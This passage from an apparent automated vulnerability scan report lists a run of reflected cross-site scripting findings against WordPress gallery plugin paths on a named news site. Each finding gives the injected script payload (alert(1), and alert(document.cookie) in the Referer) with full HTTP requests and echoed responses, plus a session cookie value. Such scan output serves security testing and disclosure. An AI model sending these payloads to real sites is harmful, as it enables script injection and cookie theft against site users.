Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80254"><script>alert(1)</script>4ff3845c1a0 was submitted in the REST URL parameter 5. This input was echoed as 80254\"><script>alert(1)</script>4ff3845c1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css80254"><script>alert(1)</script>4ff3845c1a0?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css80254\"><script>alert(1)</script>4ff3845c1a0?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.260. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d109b"><script>alert(1)</script>740b7d3f573 was submitted in the REST URL parameter 1. This input was echoed as d109b\"><script>alert(1)</script>740b7d3f573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd109b"><script>alert(1)</script>740b7d3f573/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentd109b\"><script>alert(1)</script>740b7d3f573/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.261. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 758a3"><script>alert(1)</script>892ebe730c3 was submitted in the REST URL parameter 2. This input was echoed as 758a3\"><script>alert(1)</script>892ebe730c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins758a3"><script>alert(1)</script>892ebe730c3/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins758a3\"><script>alert(1)</script>892ebe730c3/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.262. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f9"><script>alert(1)</script>4c3ca8661e8 was submitted in the REST URL parameter 3. This input was echoed as 623f9\"><script>alert(1)</script>4c3ca8661e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery623f9"><script>alert(1)</script>4c3ca8661e8/shutter/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery623f9\"><script>alert(1)</script>4c3ca8661e8/shutter/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.263. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0249"><script>alert(1)</script>e70c9a46f95 was submitted in the REST URL parameter 4. This input was echoed as a0249\"><script>alert(1)</script>e70c9a46f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shuttera0249"><script>alert(1)</script>e70c9a46f95/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:32 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shuttera0249\"><script>alert(1)</script>e70c9a46f95/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.264. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3874"><script>alert(1)</script>f2e271e0695 was submitted in the REST URL parameter 5. This input was echoed as a3874\"><script>alert(1)</script>f2e271e0695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsa3874"><script>alert(1)</script>f2e271e0695?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsa3874\"><script>alert(1)</script>f2e271e0695?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.265. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f2c8"><script>alert(1)</script>3d7379d10e9 was submitted in the REST URL parameter 1. This input was echoed as 2f2c8\"><script>alert(1)</script>3d7379d10e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2f2c8"><script>alert(1)</script>3d7379d10e9/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:10 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content2f2c8\"><script>alert(1)</script>3d7379d10e9/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.266. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8e2"><script>alert(1)</script>31aa82faf21 was submitted in the REST URL parameter 2. This input was echoed as af8e2\"><script>alert(1)</script>31aa82faf21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsaf8e2"><script>alert(1)</script>31aa82faf21/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:19:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsaf8e2\"><script>alert(1)</script>31aa82faf21/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.267. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f61"><script>alert(1)</script>ec29f575b8e was submitted in the REST URL parameter 3. This input was echoed as 26f61\"><script>alert(1)</script>ec29f575b8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery26f61"><script>alert(1)</script>ec29f575b8e/SmoothGallery/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:30 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery26f61\"><script>alert(1)</script>ec29f575b8e/SmoothGallery/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.268. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa6ec"><script>alert(1)</script>2330f6dab85 was submitted in the REST URL parameter 4. This input was echoed as fa6ec\"><script>alert(1)</script>2330f6dab85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryfa6ec"><script>alert(1)</script>2330f6dab85/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:20 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryfa6ec\"><script>alert(1)</script>2330f6dab85/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.269. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d8d"><script>alert(1)</script>d206ca5bb4b was submitted in the REST URL parameter 5. This input was echoed as c1d8d\"><script>alert(1)</script>d206ca5bb4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/cssc1d8d"><script>alert(1)</script>d206ca5bb4b/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/cssc1d8d\"><script>alert(1)</script>d206ca5bb4b/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.270. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

